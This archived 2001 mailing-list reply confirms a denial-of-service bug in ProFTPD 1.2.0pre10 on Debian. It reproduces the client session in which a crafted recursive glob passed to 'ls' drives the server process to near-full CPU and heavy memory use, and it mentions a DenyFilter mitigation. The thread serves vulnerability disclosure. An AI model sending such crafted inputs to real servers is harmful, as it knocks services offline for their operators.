Re: Multiple-Vendor-FTP-Vuln. (old?)

From: Michael Faurot (mfaurotat_private)
Date: Mon Aug 20 2001 - 20:54:43 PDT

Next message: John Fitzgibbon: "Re: HTML email "bug", of sorts."

Previous message: v9at_private: "BSDi (3.0/3.1) reboot machine code as any user (non-specific)"
Next in thread: Dmitriy Kropivnitskiy: "Re: Multiple-Vendor-FTP-Vuln. (old?)"
Messages sorted by: [ date ] [ thread ] [ subject ] [ author ]

Michael Bellears <michael.bellearsat_private> wrote:
: Couldn't reproduce on Debian 2.2....

: isp-server-03:/# proftpd -v
:  - ProFTPD Version 1.2.0pre10

Debian 2.2 and the same version of ProftpD here.

According to dpkg:

dpkg -s proftpd | grep ^Version
Version: 1.2.0pre10-2.0potato1


The client side of the ftp session, that initiates the problem:
------------------------------------------------------------------------------

Script started on Mon Aug 20 18:15:49 2001
$ ftp ftp.mydomain.com
Connected to web.mydomain.com.
220 ProFTPD 1.2.0pre10 Server (mydomain.com FTP) [web.mydomain.com]
Name (ftp.mydomain.com:mfaurot):
331 Password required for mfaurot.
Password:
230 User mfaurot logged in.
Remote system type is UNIX.
Using binary mode to transfer files.
ftp> ls /../*/../*/../*/../*/../*/../*/../*/../*/../*/../*/../*/../*/../*
200 PORT command successful.
150 Opening ASCII mode data connection for file list.
Quit
$ exit
Script done on Mon Aug 20 18:18:22 2001
------------------------------------------------------------------------------

After issuing the "ls" command the server seems to freeze after
displaying "150 Opening ASCII mode data connection for file list."  It
then becomes necessary to issue a Ctrl-\ to exit the ftp client.

Now, on the server hosting Proftpd, here's the relevant bit from "top"
showing the proftpd process sucking all the available CPU and a lot of
the RAM:
------------------------------------------------------------------------------

  6:18pm  up 5 days,  3:02,  2 users,  load average: 0.28, 0.06, 0.02           45 processes: 42 sleeping, 3 running, 0 zombie, 0 stopped
CPU states:  0.6% user,  0.1% system,  0.2% nice,  1.9% idle
Mem:  255984K av, 184876K used,  71108K free,      0K shrd,   2464K buff
Swap: 248968K av,  26260K used, 222708K free                 19400K cached
 
  PID USER     PRI  NI  SIZE  RSS SHARE STAT  LIB %CPU %MEM   TIME COMMAND
27556 mfaurot   20   0 76884  75M   952 R       0 96.4 30.0   0:21 proftpd
27561 mfaurot   12   0  1476 1476   740 R       0  2.8  0.5   0:00 top
    1 root       8   0   132   84    60 S       0  0.0  0.0   0:03 init
    2 root       9   0     0    0     0 SW      0  0.0  0.0   0:00 keventd

------------------------------------------------------------------------------

NOTE:  The configuration option "DenyFilter \*.*/" has not been applied
to this system.  While that might well resolve the issue for me, 
that's not going to fix the problem for the next person that is
unaware of the bug.  

In discussing this situation with Robert van der Meulen, I note that
this only happens when one logs in with a regular user id and
password, but it doesn't happen when doing an anonymous login.

-- 
------------------------------------------------------------------------------
 Michael | mfaurot  | We're all just basically monkeys with car keys.
 Faurot  | atww.org |

Next message: John Fitzgibbon: "Re: HTML email "bug", of sorts."
Previous message: v9at_private: "BSDi (3.0/3.1) reboot machine code as any user (non-specific)"
Next in thread: Dmitriy Kropivnitskiy: "Re: Multiple-Vendor-FTP-Vuln. (old?)"
Messages sorted by: [ date ] [ thread ] [ subject ] [ author ]

This archive was generated by hypermail 2b30 : Mon Aug 20 2001 - 21:10:34 PDT